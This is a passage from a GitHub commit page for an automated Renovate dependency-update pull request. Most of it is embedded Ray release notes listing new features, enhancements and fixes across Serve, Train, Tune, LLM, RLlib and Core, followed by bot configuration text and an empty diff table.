[#​61386](https://redirect.github.com/ray-project/ray/issues/61386))
- Updated scheduling and configuration docs, including replica
scheduling guidance and a catalog of Serve environment variables, so
operators can tune deployments with less guesswork.
([#​60922](https://redirect.github.com/ray-project/ray/issues/60922),
[#​60807](https://redirect.github.com/ray-project/ray/issues/60807))
- Clarified multiplexing and async behavior docs (including model
pre-warming constraints and request-cancel semantics) to prevent common
integration mistakes.
([#​61842](https://redirect.github.com/ray-project/ray/issues/61842),
[#​62280](https://redirect.github.com/ray-project/ray/issues/62280))
##### 🏗 Architecture refactoring:
- Refactored deployment-state execution to skip unnecessary steady-state
per-tick work, lowering control-loop churn and creating cleaner hooks
for future scheduling logic.
([#​60840](https://redirect.github.com/ray-project/ray/issues/60840))
- Moved autoscaling metric aggregation into Cython-backed paths and
added focused controller benchmarking, giving a stronger performance
baseline for future Serve controller changes.
([#​58892](https://redirect.github.com/ray-project/ray/issues/58892),
[#​61368](https://redirect.github.com/ray-project/ray/issues/61368))
- Simplified internal structure by migrating shared internals away from
private modules and consolidating replica abstractions, reducing
coupling and maintenance complexity.
([#​60849](https://redirect.github.com/ray-project/ray/issues/60849),
[#​61363](https://redirect.github.com/ray-project/ray/issues/61363),
[#​60198](https://redirect.github.com/ray-project/ray/issues/60198))
#### Ray Train
##### 🎉 New Features
- Elastic training: core capability, user guide, release tests,
multi-host TPU, telemetry
([#​60721](https://redirect.github.com/ray-project/ray/issues/60721),
[#​61115](https://redirect.github.com/ray-project/ray/issues/61115),
[#​61133](https://redirect.github.com/ray-project/ray/issues/61133),
[#​61299](https://redirect.github.com/ray-project/ray/issues/61299),
[#​61267](https://redirect.github.com/ray-project/ray/issues/61267))
- Add HF TRL (Transformer Reinforcement Learning) example
([#​61627](https://redirect.github.com/ray-project/ray/issues/61627))
- Add Tensor Parallel templates for DeepSpeed AutoTP and DTensor
([#​60160](https://redirect.github.com/ray-project/ray/issues/60160),
[#​60158](https://redirect.github.com/ray-project/ray/issues/60158))
- Add `status` attribute to `ReportedCheckpoint`
([#​61684](https://redirect.github.com/ray-project/ray/issues/61684))
- Richer Train run metadata
([#​59186](https://redirect.github.com/ray-project/ray/issues/59186))
- Add timers for Train worker initialization
([#​60870](https://redirect.github.com/ray-project/ray/issues/60870))
- Configure `torchft` environment
([#​61156](https://redirect.github.com/ray-project/ray/issues/61156))
##### 💫 Enhancements
- Register training resources with `AutoscalingCoordinator` in
`FixedScalingPolicy`
([#​61703](https://redirect.github.com/ray-project/ray/issues/61703))
- Decouple `datasets` field from `TrainRunContext`
([#​61953](https://redirect.github.com/ray-project/ray/issues/61953))
- Log warning for `checkpoint_upload_fn` when slow
([#​61720](https://redirect.github.com/ray-project/ray/issues/61720))
- Fix `StateManagerCallback` to accept datasets explicitly
([#​62042](https://redirect.github.com/ray-project/ray/issues/62042))
- Make train run abortable during `before_controller_shutdown`
([#​61816](https://redirect.github.com/ray-project/ray/issues/61816))
- Graceful abort catches all `RayActorError`
([#​61375](https://redirect.github.com/ray-project/ray/issues/61375))
- Refactor checkpoint and `sync_actor` to use `wait_with_logging`
([#​61063](https://redirect.github.com/ray-project/ray/issues/61063))
- Unwrap `UserExceptionWithTraceback` in
`WorkerGroupError.worker_failures`
([#​61153](https://redirect.github.com/ray-project/ray/issues/61153))
##### 🔨 Fixes
- Fix v2 `PlacementGroupCleaner` zombie actor
([#​61756](https://redirect.github.com/ray-project/ray/issues/61756))
- Fix checkpoint paths for multinode run
([#​61471](https://redirect.github.com/ray-project/ray/issues/61471))
- Abort cancels validation tasks with deterministic resumption
([#​61510](https://redirect.github.com/ray-project/ray/issues/61510))
- Fix deepspeed finetune release test
([#​61266](https://redirect.github.com/ray-project/ray/issues/61266))
##### 📖 Documentation
- Add section on async validation with experiment tracking
([#​62104](https://redirect.github.com/ray-project/ray/issues/62104))
- Add section on when to use async validation
([#​61702](https://redirect.github.com/ray-project/ray/issues/61702))
#### Ray Tune
##### 💫 Enhancements
- Remove deprecated `Logger` interface and `logger_creator`
([#​61181](https://redirect.github.com/ray-project/ray/issues/61181))
##### 🔨 Fixes
- Fix PBT trial order when `NaN` values are present
([#​57160](https://redirect.github.com/ray-project/ray/issues/57160))
#### Ray LLM
##### 🎉 New Features
- Replace `PDProxyServer` with decode-as-orchestrator PD architecture
([#​62076](https://redirect.github.com/ray-project/ray/issues/62076))
- Introduce DP group fault tolerance for WideEP deployments
([#​61480](https://redirect.github.com/ray-project/ray/issues/61480))
- SGLang engine: streaming chat/completions, tokenize/detokenize,
embeddings, multi-GPU TP/PP
([#​61236](https://redirect.github.com/ray-project/ray/issues/61236),
[#​61446](https://redirect.github.com/ray-project/ray/issues/61446),
[#​61159](https://redirect.github.com/ray-project/ray/issues/61159),
[#​61201](https://redirect.github.com/ray-project/ray/issues/61201),
[#​62221](https://redirect.github.com/ray-project/ray/issues/62221))
- Add `bundle_per_worker` config for simpler placement group setup
([#​59903](https://redirect.github.com/ray-project/ray/issues/59903))
- Separate Data and Serve LLM dashboards with improved panel visibility
([#​61037](https://redirect.github.com/ray-project/ray/issues/61037),
[#​62069](https://redirect.github.com/ray-project/ray/issues/62069))
##### 💫 Enhancements
- Promote Data LLM and Serve LLM APIs to beta
([#​61249](https://redirect.github.com/ray-project/ray/issues/61249),
[#​62054](https://redirect.github.com/ray-project/ray/issues/62054),
[#​62223](https://redirect.github.com/ray-project/ray/issues/62223))
- Upgrade vLLM to 0.16.0, 0.17.0, and 0.18.0
([#​61389](https://redirect.github.com/ray-project/ray/issues/61389),
[#​61598](https://redirect.github.com/ray-project/ray/issues/61598),
[#​61952](https://redirect.github.com/ray-project/ray/issues/61952))
- Upgrade NIXL to v1.0.0 and fix tensor transport issues
([#​61991](https://redirect.github.com/ray-project/ray/issues/61991))
- Unify duplicated `PlacementGroup` config schemes
([#​62241](https://redirect.github.com/ray-project/ray/issues/62241))
- Decouple Serve LLM ingress from vLLM protocol models
([#​61931](https://redirect.github.com/ray-project/ray/issues/61931))
- Set download task `num_cpus=0` to reduce contention on low-CPU
machines
([#​61191](https://redirect.github.com/ray-project/ray/issues/61191))
- SGLangServer cleanup and replace `format_messages_to_prompt` with
`_build_chat_messages`
([#​61117](https://redirect.github.com/ray-project/ray/issues/61117),
[#​61372](https://redirect.github.com/ray-project/ray/issues/61372))
##### 🔨 Fixes
- Fix duplicate `data: [DONE]` in streaming SSE responses
([#​62246](https://redirect.github.com/ray-project/ray/issues/62246))
- Fix `enable_log_requests=False` not forwarded to vLLM `AsyncLLM`
([#​60824](https://redirect.github.com/ray-project/ray/issues/60824))
- Fix `OpenAiIngress` scale-to-zero when all models set `min_replicas=0`
([#​60836](https://redirect.github.com/ray-project/ray/issues/60836))
- Handle missing state attributes from vLLM's task-conditional
`init_app_state`
([#​60812](https://redirect.github.com/ray-project/ray/issues/60812))
- Fix NIXL side channel host for cross-node P/D disaggregation
([#​60817](https://redirect.github.com/ray-project/ray/issues/60817))
- Fix `trust_remote_code` download
([#​60344](https://redirect.github.com/ray-project/ray/issues/60344))
- Avoid deprecated `TRANSFORMERS_CACHE`; treat HuggingFace config load
failure as non-fatal
([#​60854](https://redirect.github.com/ray-project/ray/issues/60854))
- Fix sequential batch processing in SGLangServer
([#​61189](https://redirect.github.com/ray-project/ray/issues/61189))
##### 📖 Documentation
- Update data parallel attention documentation
([#​61706](https://redirect.github.com/ray-project/ray/issues/61706))
- Add custom tokenizer example
([#​61098](https://redirect.github.com/ray-project/ray/issues/61098))
- Add C/C++ binaries incompatibility workaround
([#​62110](https://redirect.github.com/ray-project/ray/issues/62110))
#### Ray RLlib
##### 💫 Enhancements
- Connector/batching optimizations: ndarray fast paths, direct env step
pipeline, batch reuse
([#​61320](https://redirect.github.com/ray-project/ray/issues/61320),
[#​61255](https://redirect.github.com/ray-project/ray/issues/61255),
[#​61256](https://redirect.github.com/ray-project/ray/issues/61256),
[#​61259](https://redirect.github.com/ray-project/ray/issues/61259),
[#​61144](https://redirect.github.com/ray-project/ray/issues/61144))
- Unify default encoders for all algorithms
([#​60302](https://redirect.github.com/ray-project/ray/issues/60302))
- Toggle eval/train mode in `TorchRLModule` forward passes
([#​61985](https://redirect.github.com/ray-project/ray/issues/61985))
- Clean up offline prelearner and unit testing
([#​60632](https://redirect.github.com/ray-project/ray/issues/60632))
- Remove duplicate assignments in `AlgorithmConfig`
([#​61233](https://redirect.github.com/ray-project/ray/issues/61233))
- Remove legacy RLlib release tests
([#​59288](https://redirect.github.com/ray-project/ray/issues/59288))
- Add APPO example with Footsies environment
([#​59006](https://redirect.github.com/ray-project/ray/issues/59006))
##### 🔨 Fixes
- Support custom eval functions returning zero `eval_results`,
`env_steps`, or `agent_steps`
([#​61563](https://redirect.github.com/ray-project/ray/issues/61563))
- Fix `PrioritizedEpisodeReplayBuffer` bug
([#​60065](https://redirect.github.com/ray-project/ray/issues/60065))
- Fix missing `LayerNorm` in `RLModuleSpec`
([#​61025](https://redirect.github.com/ray-project/ray/issues/61025))
- Fix evaluation in parallel to training
([#​60777](https://redirect.github.com/ray-project/ray/issues/60777))
- Fix `MultiAgentEpisode.env_t_to_agent_t`
([#​60319](https://redirect.github.com/ray-project/ray/issues/60319))
- Fix default metric during eval
([#​61590](https://redirect.github.com/ray-project/ray/issues/61590))
- Fix incorrect log value of environment steps sampled/trained
([#​56599](https://redirect.github.com/ray-project/ray/issues/56599))
- Prevent `torch_learner.py` crash under parameter-freezing edge cases
([#​62158](https://redirect.github.com/ray-project/ray/issues/62158))
#### Ray Core
##### 🎉 New Features
- Resource isolation: pressure-based memory monitor, time-based killing,
cgroup constraints
([#​61361](https://redirect.github.com/ray-project/ray/issues/61361),
[#​61323](https://redirect.github.com/ray-project/ray/issues/61323),
[#​61097](https://redirect.github.com/ray-project/ray/issues/61097),
[#​61210](https://redirect.github.com/ray-project/ray/issues/61210),
[#​61297](https://redirect.github.com/ray-project/ray/issues/61297),
[#​59365](https://redirect.github.com/ray-project/ray/issues/59365),
[#​59368](https://redirect.github.com/ray-project/ray/issues/59368),
[#​60752](https://redirect.github.com/ray-project/ray/issues/60752))
- IPPR: add `ResizeRayletResourceInstances` to GCS/Python client,
schema/status models, KubeRay provider
([#​61654](https://redirect.github.com/ray-project/ray/issues/61654),
[#​61666](https://redirect.github.com/ray-project/ray/issues/61666),
[#​61803](https://redirect.github.com/ray-project/ray/issues/61803),
[#​61814](https://redirect.github.com/ray-project/ray/issues/61814))
- Add `PlatformEvent` proto and placement group events in one-event
framework
([#​61701](https://redirect.github.com/ray-project/ray/issues/61701),
[#​60449](https://redirect.github.com/ray-project/ray/issues/60449))
- Add Nvidia B300 support
([#​60753](https://redirect.github.com/ray-project/ray/issues/60753))
- Add UV support for Ray Client mode
([#​60868](https://redirect.github.com/ray-project/ray/issues/60868))
- Add `Percentile` metric type backed by quadratic histogram
([#​61148](https://redirect.github.com/ray-project/ray/issues/61148))
- Expose `fallback_strategy` in `TaskInfoEntry` and `ActorTableData`
([#​60659](https://redirect.github.com/ray-project/ray/issues/60659))
- Add submission job proto changes
([#​60857](https://redirect.github.com/ray-project/ray/issues/60857))
- Add TPU util for ready multi-host slice count; simplify elastic TPU
scaling
([#​61300](https://redirect.github.com/ray-project/ray/issues/61300),
[#​62141](https://redirect.github.com/ray-project/ray/issues/62141))
- Introduce per-node level temp-dir
([#​60761](https://redirect.github.com/ray-project/ray/issues/60761))
- Make `ray.put()` generic: `put(value: R) -> ObjectRef[R]`
([#​60995](https://redirect.github.com/ray-project/ray/issues/60995))
- Add Python 3.14 support for recursion limit handling
([#​58459](https://redirect.github.com/ray-project/ray/issues/58459))
##### 💫 Enhancements
- Upgrade `cloudpickle` to 3.1.2, gRPC to v1.58.0, protobuf to 3.20.3
([#​60317](https://redirect.github.com/ray-project/ray/issues/60317),
[#​61499](https://redirect.github.com/ray-project/ray/issues/61499),
[#​60736](https://redirect.github.com/ray-project/ray/issues/60736))
- Multiple gRPC connections for improved object transfer throughput,
enabled by default
([#​61121](https://redirect.github.com/ray-project/ray/issues/61121),
[#​61440](https://redirect.github.com/ray-project/ray/issues/61440))
- Improve `pg.ready()` performance via async GCS RPC; fix deadlocks
([#​60657](https://redirect.github.com/ray-project/ray/issues/60657),
[#​62086](https://redirect.github.com/ray-project/ray/issues/62086))
- RDT: non-torch transfers, PyTorch storage caching, metadata caching,
NIXL agent reuse
([#​61081](https://redirect.github.com/ray-project/ray/issues/61081),
[#​60999](https://redirect.github.com/ray-project/ray/issues/60999),
[#​60689](https://redirect.github.com/ray-project/ray/issues/60689),
[#​60602](https://redirect.github.com/ray-project/ray/issues/60602))
- Cache `ActorHandle.__hash__` and fix `__eq__` correctness
([#​61638](https://redirect.github.com/ray-project/ray/issues/61638))
- Cache `find_gcs_addresses`
([#​61065](https://redirect.github.com/ray-project/ray/issues/61065))
- Optimize worker listener thread
([#​61353](https://redirect.github.com/ray-project/ray/issues/61353))
- Eliminate Python GCS client from state manager `get_all_node_info`
([#​61232](https://redirect.github.com/ray-project/ray/issues/61232))
- Loosen restriction on worker thread count
([#​62279](https://redirect.github.com/ray-project/ray/issues/62279))
- Sequence in-order actor tasks per concurrency group instead of
globally
([#​61082](https://redirect.github.com/ray-project/ray/issues/61082))
- Prioritize killing workers that occupy large memory in OOM killer
([#​60330](https://redirect.github.com/ray-project/ray/issues/60330))
- Cap exponential backoff attempt number to prevent integer overflow
([#​61003](https://redirect.github.com/ray-project/ray/issues/61003))
- Replace deprecated threading APIs (`getName`/`setDaemon`)
([#​62153](https://redirect.github.com/ray-project/ray/issues/62153))
- Improve error handling for `@ray.remote`/`@ray.method` with
`num_returns`
([#​59286](https://redirect.github.com/ray-project/ray/issues/59286))
- Convert `StopIteration` on non-generator functions to `RuntimeError`
([#​60521](https://redirect.github.com/ray-project/ray/issues/60521))
- Surface warnings for scheduling rate limits slowing task ramp-up
([#​61004](https://redirect.github.com/ray-project/ray/issues/61004))
- Periodically reload service account tokens; use
`AuthenticationValidator` in sync server
([#​60778](https://redirect.github.com/ray-project/ray/issues/60778),
[#​60779](https://redirect.github.com/ray-project/ray/issues/60779))
- Remove support for `local_mode`
([#​60647](https://redirect.github.com/ray-project/ray/issues/60647))
- Allow matching `worker_process_setup_hook` on re-entry
([#​61473](https://redirect.github.com/ray-project/ray/issues/61473))
- Reduce default event aggregator buffer size to avoid OOM
([#​60826](https://redirect.github.com/ray-project/ray/issues/60826))
- Suppress autoscaler action logs for read-only provider
([#​61732](https://redirect.github.com/ray-project/ray/issues/61732))
- Lazy subscription to node changes on non-driver workers
([#​61118](https://redirect.github.com/ray-project/ray/issues/61118))
- Tighten export symbol allowlists to prevent non-ray symbol leakage
([#​61298](https://redirect.github.com/ray-project/ray/issues/61298))
- Approximate USS from `memory_info` instead of calling
`memory_full_info`
([#​60000](https://redirect.github.com/ray-project/ray/issues/60000))
- Dedicated IO context for `NodeManager` and `InternalKVManager`
([#​61002](https://redirect.github.com/ray-project/ray/issues/61002))
- Print gRPC peer address on GCS
`HandleUnregisterNode`/`HandleDrainNode`
([#​62226](https://redirect.github.com/ray-project/ray/issues/62226),
[#​62112](https://redirect.github.com/ray-project/ray/issues/62112))
##### 🔨 Fixes
- Fix task stuck when pop worker repeatedly fails
([#​60104](https://redirect.github.com/ray-project/ray/issues/60104))
- Fix `bool` env var parsing for `RAY_CGRAPH_overlap_gpu_communication`
([#​61421](https://redirect.github.com/ray-project/ray/issues/61421))
- Fix negative RUNNING task metric
([#​62070](https://redirect.github.com/ray-project/ray/issues/62070))
- Fix `OnNodeDead` to destroy all owned actors when owner node dies
([#​60669](https://redirect.github.com/ray-project/ray/issues/60669))
- Fix actor task queue blocked after cancelling head task
([#​60850](https://redirect.github.com/ray-project/ray/issues/60850))
- Fix `TASK_PROFILE_EVENT` aggregation for multiple phases
([#​61559](https://redirect.github.com/ray-project/ray/issues/61559))
- Fix double-counting in `WorkerPool::WarnAboutSize()`
([#​61246](https://redirect.github.com/ray-project/ray/issues/61246))
- Fix `TaskLifecycleEvent.node_id` using emitting node instead of
executor
([#​61478](https://redirect.github.com/ray-project/ray/issues/61478))
- Fix `publisher_id` type mismatch in GCS pubsub
([#​61518](https://redirect.github.com/ray-project/ray/issues/61518))
- Fix `dataclass.asdict` with `None` in dashboard `list_jobs` API
([#​61033](https://redirect.github.com/ray-project/ray/issues/61033))
- Fix dashboard node head API dead node cache
([#​61185](https://redirect.github.com/ray-project/ray/issues/61185))
- Fix dashboard event agent for events without HTTP scheme
([#​60811](https://redirect.github.com/ray-project/ray/issues/60811))
- Fix Ray Actor typing for async methods
([#​60682](https://redirect.github.com/ray-project/ray/issues/60682))
- Fix autoscaler retry during k8s exceptions
([#​60658](https://redirect.github.com/ray-project/ray/issues/60658))
- Fix `ReadOnlyPro
</details>
---
### Configuration
📅 **Schedule**: (UTC)
- Branch creation
- ""
- Automerge
- At any time (no schedule defined)
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/vortex-data/vortex).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6WyJjaGFuZ2Vsb2cvY2hvcmUiXX0=-->
---------
Signed-off-by: Robert Kruszewski <github@robertk.io>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Robert Kruszewski <github@robertk.io>1 parent ea31cc2 commit 69b3fc6
3 files changed
Lines changed: 26 additions & 21 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
133 | 133 | | |
134 | 134 | | |
135 | 135 | | |
136 | | - | |
| 136 | + | |
137 | 137 | | |
138 | 138 | | |
139 | 139 | | |
| |||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
14 | 14 | | |
15 | 15 | | |
16 | 16 | | |
17 | | - | |
18 | | - | |
19 | | - | |
20 | | - | |
21 | | - | |
22 | | - | |
23 | | - | |
| 17 | + | |
| 18 | + | |
| 19 | + | |
| 20 | + | |
| 21 | + | |
| 22 | + | |
| 23 | + | |
| 24 | + | |
| 25 | + | |
24 | 26 | | |
25 | 27 | | |
26 | 28 | | |
| |||
53 | 55 | | |
54 | 56 | | |
55 | 57 | | |
56 | | - | |
| 58 | + | |
57 | 59 | | |
58 | 60 | | |
59 | 61 | | |
0 commit comments